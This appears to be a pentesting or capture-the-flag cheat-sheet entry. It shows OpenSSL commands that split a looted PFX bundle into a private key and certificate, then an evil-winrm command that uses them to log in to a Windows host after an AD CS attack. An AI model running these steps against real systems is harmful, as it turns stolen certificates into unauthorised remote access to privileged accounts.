← Back to search

OpenSSL — Extract Key & Cert from PFX

credentialstool

Summary

When you loot a .pfx, split it into a key and certificate with OpenSSL, then use them for certificate-based WinRM auth.

Walkthrough

After looting a .pfx (PKCS#12 bundle), break it apart so the key and cert can be used for certificate-based authentication:

  1. Extract the private key (it comes out encrypted, then strip the passphrase).
  2. Extract the client certificate.
  3. Authenticate over WinRM with -k key -c cert (the -S flag enables TLS).

This is the typical follow-up after an AD CS / ESC attack where you end up with a PFX for a privileged user.

Commands

bash

# Split a .pfx into an encrypted key, then a clean key
openssl pkcs12 -in auth.pfx -nocerts -out auth.key-enc
openssl rsa -in auth.key-enc -out auth.key

bash

# Export the certificate
openssl pkcs12 -in auth.pfx -clcerts -nokeys -out auth.crt

bash

# Authenticate over WinRM using the cert + key
evil-winrm -i <IP> -S -k auth.key -c auth.crt